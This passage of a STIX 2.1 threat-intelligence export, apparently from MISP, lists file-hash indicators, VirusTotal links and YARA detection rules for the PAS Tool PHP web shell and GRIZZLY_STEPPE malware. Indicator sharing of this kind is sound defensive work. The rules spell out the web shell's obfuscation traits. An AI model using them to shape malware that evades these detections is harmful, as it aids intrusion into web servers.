"value": "https://www.virustotal.com/file/64ad97ddebc2f0e95b03b56cb2fff1c2c494d2c417c84572be09ae5794638f19/analysis/1480711757/"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5867ab53-cfd4-4844-a83c-4da102de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-12-31T12:57:55.000Z",
"modified": "2016-12-31T12:57:55.000Z",
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: edd14d44423bfd37f213906fbd3057f793e71cad5b11832375c98a421621d1d0",
"pattern": "[file:hashes.SHA1 = 'a6c6027eabde338021a59d37008874f8139d519e']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-12-31T12:57:55Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha1\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5867ab54-f570-4e06-9e43-45dd02de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-12-31T12:57:56.000Z",
"modified": "2016-12-31T12:57:56.000Z",
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: edd14d44423bfd37f213906fbd3057f793e71cad5b11832375c98a421621d1d0",
"pattern": "[file:hashes.MD5 = 'f189fdf925c710e9e110ae09b91afbc3']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-12-31T12:57:56Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"md5\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5867ab54-f590-4254-97dc-47bd02de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-12-31T12:57:56.000Z",
"modified": "2016-12-31T12:57:56.000Z",
"first_observed": "2016-12-31T12:57:56Z",
"last_observed": "2016-12-31T12:57:56Z",
"number_observed": 1,
"object_refs": [
"url--5867ab54-f590-4254-97dc-47bd02de0b81"
],
"labels": [
"misp:type=\"link\"",
"misp:category=\"External analysis\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--5867ab54-f590-4254-97dc-47bd02de0b81",
"value": "https://www.virustotal.com/file/edd14d44423bfd37f213906fbd3057f793e71cad5b11832375c98a421621d1d0/analysis/1479994492/"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5867ab55-4468-4e85-be37-454c02de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-12-31T12:57:57.000Z",
"modified": "2016-12-31T12:57:57.000Z",
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 324eafb0da0943d2f83be775bfb58646765712642a4ed1ece1a27eeec65ad086",
"pattern": "[file:hashes.SHA1 = 'e8f80180622b001eeacc584a54a231346face5b5']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-12-31T12:57:57Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha1\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5867ab56-85dc-46b2-8b29-4e4b02de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-12-31T12:57:58.000Z",
"modified": "2016-12-31T12:57:58.000Z",
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 324eafb0da0943d2f83be775bfb58646765712642a4ed1ece1a27eeec65ad086",
"pattern": "[file:hashes.MD5 = '91176827364ed0b81322f78c90eb2af3']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-12-31T12:57:58Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"md5\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5867ab56-44c4-4de0-8352-4a1f02de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-12-31T12:57:58.000Z",
"modified": "2016-12-31T12:57:58.000Z",
"first_observed": "2016-12-31T12:57:58Z",
"last_observed": "2016-12-31T12:57:58Z",
"number_observed": 1,
"object_refs": [
"url--5867ab56-44c4-4de0-8352-4a1f02de0b81"
],
"labels": [
"misp:type=\"link\"",
"misp:category=\"External analysis\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--5867ab56-44c4-4de0-8352-4a1f02de0b81",
"value": "https://www.virustotal.com/file/324eafb0da0943d2f83be775bfb58646765712642a4ed1ece1a27eeec65ad086/analysis/1477380701/"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5867ab57-8950-4855-8d5e-46c002de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-12-31T12:57:59.000Z",
"modified": "2016-12-31T12:57:59.000Z",
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: b8313a966f93f773b031d386afe56792fe1edb0ffd1bc07a9ae72cec48e0d6f1",
"pattern": "[file:hashes.SHA1 = '98d37c2d0450e4715584970c281cb163002cbb8e']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-12-31T12:57:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha1\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5867ab58-6ec4-48e7-8cf6-4eb602de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-12-31T12:58:00.000Z",
"modified": "2016-12-31T12:58:00.000Z",
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: b8313a966f93f773b031d386afe56792fe1edb0ffd1bc07a9ae72cec48e0d6f1",
"pattern": "[file:hashes.MD5 = '6f19d3ccb1ba38b11794876b2be345b2']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-12-31T12:58:00Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"md5\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5867ab58-6044-4572-8efe-4fea02de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-12-31T12:58:00.000Z",
"modified": "2016-12-31T12:58:00.000Z",
"first_observed": "2016-12-31T12:58:00Z",
"last_observed": "2016-12-31T12:58:00Z",
"number_observed": 1,
"object_refs": [
"url--5867ab58-6044-4572-8efe-4fea02de0b81"
],
"labels": [
"misp:type=\"link\"",
"misp:category=\"External analysis\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--5867ab58-6044-4572-8efe-4fea02de0b81",
"value": "https://www.virustotal.com/file/b8313a966f93f773b031d386afe56792fe1edb0ffd1bc07a9ae72cec48e0d6f1/analysis/1481525510/"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5867ab59-2814-4089-a276-4a7102de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-12-31T12:58:01.000Z",
"modified": "2016-12-31T12:58:01.000Z",
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 1025f33ff026495d7f7fdb527e127e2b7780d9d28cb1e7912a9be84f38ba858e",
"pattern": "[file:hashes.SHA1 = '7597be3cae3680e89e14f7f7cc1138c6c0b482e1']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-12-31T12:58:01Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha1\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5867ab5a-12f8-4159-b3bd-405602de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-12-31T12:58:02.000Z",
"modified": "2016-12-31T12:58:02.000Z",
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 1025f33ff026495d7f7fdb527e127e2b7780d9d28cb1e7912a9be84f38ba858e",
"pattern": "[file:hashes.MD5 = 'bd7b3f08183cf531f09b47311dec69d7']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-12-31T12:58:02Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"md5\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5867ab5b-ff04-4404-8841-4d9c02de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-12-31T12:58:03.000Z",
"modified": "2016-12-31T12:58:03.000Z",
"first_observed": "2016-12-31T12:58:03Z",
"last_observed": "2016-12-31T12:58:03Z",
"number_observed": 1,
"object_refs": [
"url--5867ab5b-ff04-4404-8841-4d9c02de0b81"
],
"labels": [
"misp:type=\"link\"",
"misp:category=\"External analysis\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--5867ab5b-ff04-4404-8841-4d9c02de0b81",
"value": "https://www.virustotal.com/file/1025f33ff026495d7f7fdb527e127e2b7780d9d28cb1e7912a9be84f38ba858e/analysis/1477902539/"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5867ab5b-1274-4245-b71a-46d502de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-12-31T12:58:03.000Z",
"modified": "2016-12-31T12:58:03.000Z",
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: d285115e97c02063836f1cf8f91669c114052727c39bf4bd3c062ad5b3509e38",
"pattern": "[file:hashes.SHA1 = 'adf649354ff4d1812e7de745214362959e0174b1']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-12-31T12:58:03Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha1\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5867ab5c-c818-4db9-84a5-4ce402de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-12-31T12:58:04.000Z",
"modified": "2016-12-31T12:58:04.000Z",
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: d285115e97c02063836f1cf8f91669c114052727c39bf4bd3c062ad5b3509e38",
"pattern": "[file:hashes.MD5 = 'fc45abdd5fb3ffa4d3799737b3f597f4']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-12-31T12:58:04Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"md5\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5867ab5c-0194-421b-b029-41ac02de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-12-31T12:58:04.000Z",
"modified": "2016-12-31T12:58:04.000Z",
"first_observed": "2016-12-31T12:58:04Z",
"last_observed": "2016-12-31T12:58:04Z",
"number_observed": 1,
"object_refs": [
"url--5867ab5c-0194-421b-b029-41ac02de0b81"
],
"labels": [
"misp:type=\"link\"",
"misp:category=\"External analysis\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--5867ab5c-0194-421b-b029-41ac02de0b81",
"value": "https://www.virustotal.com/file/d285115e97c02063836f1cf8f91669c114052727c39bf4bd3c062ad5b3509e38/analysis/1483125351/"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5867ab5d-e71c-4547-ad36-4ef002de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-12-31T12:58:05.000Z",
"modified": "2016-12-31T12:58:05.000Z",
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 972866536f195079071d23b9f8ec90eb32ae3aa493d8cdf5ad34b85dec1a0775",
"pattern": "[file:hashes.SHA1 = '0de0be33ffbb98a60286be3bd19e02099d87a978']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-12-31T12:58:05Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha1\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5867ab5e-dbdc-45e2-aa3e-4f9a02de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-12-31T12:58:06.000Z",
"modified": "2016-12-31T12:58:06.000Z",
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 972866536f195079071d23b9f8ec90eb32ae3aa493d8cdf5ad34b85dec1a0775",
"pattern": "[file:hashes.MD5 = '5bced75b16bb0a00b7fd61bf03e5f602']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-12-31T12:58:06Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"md5\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5867ab5e-88ac-476b-89cc-4e2702de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-12-31T12:58:06.000Z",
"modified": "2016-12-31T12:58:06.000Z",
"first_observed": "2016-12-31T12:58:06Z",
"last_observed": "2016-12-31T12:58:06Z",
"number_observed": 1,
"object_refs": [
"url--5867ab5e-88ac-476b-89cc-4e2702de0b81"
],
"labels": [
"misp:type=\"link\"",
"misp:category=\"External analysis\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--5867ab5e-88ac-476b-89cc-4e2702de0b81",
"value": "https://www.virustotal.com/file/972866536f195079071d23b9f8ec90eb32ae3aa493d8cdf5ad34b85dec1a0775/analysis/1476900530/"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5867ab5f-5434-40c4-90b3-405c02de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-12-31T12:58:07.000Z",
"modified": "2016-12-31T12:58:07.000Z",
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: da9f2804b16b369156e1b629ad3d2aac79326b94284e43c7b8355f3db71912b8",
"pattern": "[file:hashes.SHA1 = 'efcc0c18e10072b50deeca9592c76bc90f4d18ce']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-12-31T12:58:07Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha1\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5867ab60-d440-410f-a9c4-4db102de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-12-31T12:58:08.000Z",
"modified": "2016-12-31T12:58:08.000Z",
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: da9f2804b16b369156e1b629ad3d2aac79326b94284e43c7b8355f3db71912b8",
"pattern": "[file:hashes.MD5 = 'bfcb50cffca601b33c285b9f54b64cb1']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-12-31T12:58:08Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"md5\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5867ab60-be3c-4cdc-88aa-499c02de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-12-31T12:58:08.000Z",
"modified": "2016-12-31T12:58:08.000Z",
"first_observed": "2016-12-31T12:58:08Z",
"last_observed": "2016-12-31T12:58:08Z",
"number_observed": 1,
"object_refs": [
"url--5867ab60-be3c-4cdc-88aa-499c02de0b81"
],
"labels": [
"misp:type=\"link\"",
"misp:category=\"External analysis\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--5867ab60-be3c-4cdc-88aa-499c02de0b81",
"value": "https://www.virustotal.com/file/da9f2804b16b369156e1b629ad3d2aac79326b94284e43c7b8355f3db71912b8/analysis/1483160795/"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5867ab61-03c0-4aa4-b522-4bb802de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-12-31T12:58:09.000Z",
"modified": "2016-12-31T12:58:09.000Z",
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 3367623638d42bdc1c45c44cb1843c00b510814170bc4e5da61eba2ddb212672",
"pattern": "[file:hashes.SHA1 = 'fd82bec721c32851806721b7ab25bbba3f957f49']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-12-31T12:58:09Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha1\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5867ab62-6f68-4447-9007-4f3a02de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-12-31T12:58:10.000Z",
"modified": "2016-12-31T12:58:10.000Z",
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 3367623638d42bdc1c45c44cb1843c00b510814170bc4e5da61eba2ddb212672",
"pattern": "[file:hashes.MD5 = '44a4173ce6928aa30acd276252bc1267']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-12-31T12:58:10Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"md5\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5867ab62-efd4-45e1-b6c2-44fd02de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-12-31T12:58:10.000Z",
"modified": "2016-12-31T12:58:10.000Z",
"first_observed": "2016-12-31T12:58:10Z",
"last_observed": "2016-12-31T12:58:10Z",
"number_observed": 1,
"object_refs": [
"url--5867ab62-efd4-45e1-b6c2-44fd02de0b81"
],
"labels": [
"misp:type=\"link\"",
"misp:category=\"External analysis\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--5867ab62-efd4-45e1-b6c2-44fd02de0b81",
"value": "https://www.virustotal.com/file/3367623638d42bdc1c45c44cb1843c00b510814170bc4e5da61eba2ddb212672/analysis/1481880509/"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5867ab63-cc40-4146-9b84-4d8e02de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-12-31T12:58:11.000Z",
"modified": "2016-12-31T12:58:11.000Z",
"description": "GRIZZLY_STEPPE_Malware_2 - Xchecked via VT: 55058d3427ce932d8efcbe54dccf97c9a8d1e85c767814e34f4b2b6a6b305641",
"pattern": "[file:hashes.SHA1 = '8ccaa941af229cf57a0a97327d99a46f989423f0']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-12-31T12:58:11Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha1\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5867ab63-37b4-4e0a-9066-40c002de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-12-31T12:58:11.000Z",
"modified": "2016-12-31T12:58:11.000Z",
"description": "GRIZZLY_STEPPE_Malware_2 - Xchecked via VT: 55058d3427ce932d8efcbe54dccf97c9a8d1e85c767814e34f4b2b6a6b305641",
"pattern": "[file:hashes.MD5 = '8f154d23ac2071d7f179959aaba37ad5']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-12-31T12:58:11Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"md5\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5867ab64-2004-4d85-8222-4e5302de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-12-31T12:58:12.000Z",
"modified": "2016-12-31T12:58:12.000Z",
"first_observed": "2016-12-31T12:58:12Z",
"last_observed": "2016-12-31T12:58:12Z",
"number_observed": 1,
"object_refs": [
"url--5867ab64-2004-4d85-8222-4e5302de0b81"
],
"labels": [
"misp:type=\"link\"",
"misp:category=\"External analysis\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--5867ab64-2004-4d85-8222-4e5302de0b81",
"value": "https://www.virustotal.com/file/55058d3427ce932d8efcbe54dccf97c9a8d1e85c767814e34f4b2b6a6b305641/analysis/1483162756/"
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5867ab98-aeb0-40b7-97d2-4400950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-12-31T12:59:04.000Z",
"modified": "2016-12-31T12:59:04.000Z",
"first_observed": "2016-12-31T12:59:04Z",
"last_observed": "2016-12-31T12:59:04Z",
"number_observed": 1,
"object_refs": [
"url--5867ab98-aeb0-40b7-97d2-4400950d210f"
],
"labels": [
"misp:type=\"link\"",
"misp:category=\"Support Tool\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--5867ab98-aeb0-40b7-97d2-4400950d210f",
"value": "https://raw.githubusercontent.com/Neo23x0/signature-base/master/yara/apt_apt29_grizzly_steppe.yar"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5867abaf-a80c-4ef4-87d0-4427950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-12-31T12:59:27.000Z",
"modified": "2016-12-31T12:59:27.000Z",
"pattern": "[rule GRIZZLY_STEPPE_Malware_1 {\r\n meta:\r\n description = \"Auto-generated rule - file HRDG022184_certclint.dll\"\r\n author = \"Florian Roth\"\r\n reference = \"https://goo.gl/WVflzO\"\r\n date = \"2016-12-29\"\r\n hash1 = \"9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5\"\r\n strings:\r\n $s1 = \"S:\\\\Lidstone\\\\renewing\\\\HA\\\\disable\\\\In.pdb\" fullword ascii\r\n $s2 = \"Repeat last find command)Replace specific text with different text\" fullword wide\r\n $s3 = \"l\\\\Processor(0)\\\\% Processor Time\" fullword wide\r\n $s6 = \"Self Process\" fullword wide\r\n $s7 = \"Default Process\" fullword wide\r\n $s8 = \"Star Polk.exe\" fullword wide\r\n condition:\r\n ( uint16(0) == 0x5a4d and filesize < 300KB and 4 of them )\r\n}]",
"pattern_type": "yara",
"pattern_version": "2.1",
"valid_from": "2016-12-31T12:59:27Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Artifacts dropped"
}
],
"labels": [
"misp:type=\"yara\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5867abc3-674c-47d9-8082-4d44950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-12-31T12:59:47.000Z",
"modified": "2016-12-31T12:59:47.000Z",
"pattern": "[rule GRIZZLY_STEPPE_Malware_2 {\r\n meta:\r\n description = \"Auto-generated rule - file 9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0\"\r\n author = \"Florian Roth\"\r\n reference = \"https://goo.gl/WVflzO\"\r\n date = \"2016-12-29\"\r\n hash1 = \"9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0\"\r\n hash2 = \"55058d3427ce932d8efcbe54dccf97c9a8d1e85c767814e34f4b2b6a6b305641\"\r\n strings:\r\n $x1 = \"GoogleCrashReport.dll\" fullword ascii\r\n\r\n $s1 = \"CrashErrors\" fullword ascii\r\n $s2 = \"CrashSend\" fullword ascii\r\n $s3 = \"CrashAddData\" fullword ascii\r\n $s4 = \"CrashCleanup\" fullword ascii\r\n $s5 = \"CrashInit\" fullword ascii\r\n condition:\r\n ( uint16(0) == 0x5a4d and filesize < 1000KB and $x1 ) or ( all of them )\r\n}]",
"pattern_type": "yara",
"pattern_version": "2.1",
"valid_from": "2016-12-31T12:59:47Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Artifacts dropped"
}
],
"labels": [
"misp:type=\"yara\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5867abd5-2b98-4087-9c66-4a70950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-12-31T13:00:05.000Z",
"modified": "2016-12-31T13:00:05.000Z",
"pattern": "[rule PAS_TOOL_PHP_WEB_KIT_mod {\r\n meta:\r\n description = \"Detects PAS Tool PHP Web Kit\"\r\n reference = \"https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity\"\r\n author = \"US CERT - modified by Florian Roth due to performance reasons\"\r\n date = \"2016/12/29\"\r\n strings:\r\n $php = \"<?php\"\r\n $base64decode1 = \"='base'.(\"\r\n $strreplace = \"str_replace(\\\"\\\\n\\\", ''\"\r\n $md5 = \".substr(md5(strrev(\"\r\n $gzinflate = \"gzinflate\"\r\n $cookie = \"_COOKIE\"\r\n $isset = \"isset\"\r\n condition:\r\n $php at 0 and\r\n (filesize > 10KB and filesize < 30KB) and\r\n #cookie == 2 and\r\n #isset == 3 and\r\n all of them\r\n}]",
"pattern_type": "yara",
"pattern_version": "2.1",
"valid_from": "2016-12-31T13:00:05Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Artifacts dropped"
}
],
"labels": [
"misp:type=\"yara\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
]
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5867ac24-76c0-48b5-829b-4f0e950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-12-31T13:01:24.000Z",
"modified": "2016-12-31T13:01:24.000Z",
"first_observed": "2016-12-31T13:01:24Z",
"last_observed": "2016-12-31T13:01:24Z",
"number_observed": 1,
"object_refs": [
"file--5867ac24-76c0-48b5-829b-4f0e950d210f",
"artifact--5867ac24-76c0-48b5-829b-4f0e950d210f"
],
"labels": [
"misp:type=\"attachment\"",
"misp:category=\"External analysis\""
]
},
{
"type": "file",
"spec_version": "2.1",
"id": "file--5867ac24-76c0-48b5-829b-4f0e950d210f",
"name": "tweet-florian.png",
"content_ref": "artifact--5867ac24-76c0-48b5-829b-4f0e950d210f"
},
{
"type": "artifact",
"spec_version": "2.1",
"id": "artifact--5867ac24-76c0-48b5-829b-4f0e950d210f",
"payload_bin": "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
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--586b5278-1c38-4615-8db5-46e3950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2017-01-03T07:27:52.000Z",
"modified": "2017-01-03T07:27:52.000Z",
